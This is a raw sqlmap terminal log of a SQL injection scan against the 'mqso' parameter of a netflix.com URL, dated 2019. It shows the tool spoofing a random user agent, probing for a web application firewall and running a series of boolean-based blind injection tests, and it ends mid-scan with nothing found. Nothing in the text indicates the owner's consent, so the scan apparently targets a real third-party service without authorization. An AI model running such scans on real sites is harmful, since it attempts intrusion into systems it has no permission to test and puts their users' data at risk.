https://www.netflix.com/nrd/wave?mqso=81742802?viewsite=true
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.8.13#dev}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:01:35 /2019-08-24/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[12:01:35] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Win98; es-ES; rv:1.7.7) Gecko/20050414 Firefox/1.0.3' from file '/root/sqlmap/data/txt/user-agents.txt'
[12:01:35] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'https://www.netflix.com/getstarted'. Do you want to follow? [Y/n] Y
[12:01:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:01:48] [INFO] testing if the target URL content is stable
[12:01:54] [WARNING] GET parameter 'mqso' does not appear to be dynamic
[12:01:59] [WARNING] heuristic (basic) test shows that GET parameter 'mqso' might not be injectable
[12:02:08] [INFO] testing for SQL injection on GET parameter 'mqso'
[12:02:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:09:56] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[12:14:00] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[12:21:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[12:27:17] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[12:29:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[12:30:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[12:31:22] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
[12:32:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:35:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:37:00] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
